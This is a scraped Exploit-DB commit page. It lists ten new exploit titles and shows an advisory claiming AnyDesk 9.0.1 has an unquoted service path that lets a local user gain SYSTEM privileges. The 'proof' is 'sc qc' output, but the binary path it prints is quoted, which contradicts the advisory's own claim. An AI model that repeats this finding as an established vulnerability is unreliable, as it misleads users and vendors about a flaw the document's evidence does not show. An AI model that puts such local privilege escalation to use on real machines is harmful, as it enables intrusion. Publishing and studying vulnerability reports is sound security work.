9ddf81331a
10 changes to exploits/shellcodes/ghdb TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS) Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE) Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation compop.ca 3.5.3 - Arbitrary code Execution Usermin 2.100 - Username Enumeration ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal AnyDesk 9.0.1 - Unquoted Service Path
32 lines
No EOL
1 KiB
Text
32 lines
No EOL
1 KiB
Text
# Exploit Title: AnyDesk 9.0.1 - Unquoted Service Path
|
|
# Date: 2024-12-11
|
|
# Exploit Author: Parastou Razi
|
|
# Contact: razi.parastoo@gmail.com
|
|
# Vendor Homepage: http://anydesk.com
|
|
# Software Link: http://anydesk.com/download
|
|
# Version: Software Version 9.0.1
|
|
# Tested on: Windows 11 x64
|
|
|
|
1. Description:
|
|
|
|
The Anydesk installs as a service with an unquoted service path running
|
|
with SYSTEM privileges.
|
|
This could potentially allow an authorized but non-privileged local
|
|
user to execute arbitrary code with elevated privileges on the system.
|
|
|
|
2. Proof
|
|
|
|
C:\>sc qc anydesk --service
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: anydesk
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
|
|
--service
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : AnyDesk Service
|
|
DEPENDENCIES : RpcSs
|
|
SERVICE_START_NAME : LocalSystem |